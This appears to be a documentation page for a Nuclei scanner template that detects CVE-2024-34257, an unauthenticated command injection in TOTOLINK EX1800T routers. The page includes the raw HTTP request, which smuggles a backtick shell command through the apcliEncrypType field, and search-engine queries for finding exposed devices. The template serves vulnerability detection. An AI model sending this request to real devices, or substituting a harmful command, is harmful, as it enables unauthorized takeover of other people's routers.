TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection
ID: CVE-2024-34257
Severity: high
Author: pussycat0x
Tags: cve,cve2024,rce,unauth
Description
Section titled “Description”TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
YAML Source
Section titled “YAML Source”id: CVE-2024-34257
info: name: TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection author: pussycat0x severity: high description: | TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges. reference: - https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md - https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350 - https://github.com/20142995/nuclei-templates classification: epss-score: 0.00043 epss-percentile: 0.0926 metadata: vendor: totolink product: a3700r_firmware shodan-query: http.title:"totolink" fofa-query: title="totolink" google-query: intitle:"totolink" tags: cve,cve2024,rce,unauth
variables: file: "{{rand_base(6)}}"
http: - raw: - | POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Referer: {{RootURL}}/page/index.html
{ "token":"", "apcliEncrypType":"`id>../{{file}}.txt`", "topicurl":"setWiFiExtenderConfig" } - | GET /{{file}}.txt HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body_1 words: - '"success": true'
- type: regex part: body_2 regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status status: - 200# digest: 4a0a00473045022100e0a033672220289689891ec56759966f05ffc557318856fb9ae6ec6fa0019201022001fa7d09b28d51cef9258e7d8e1c6fcfd58b8b093285c8e451ca22b30f9fbe50:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-34257.yaml"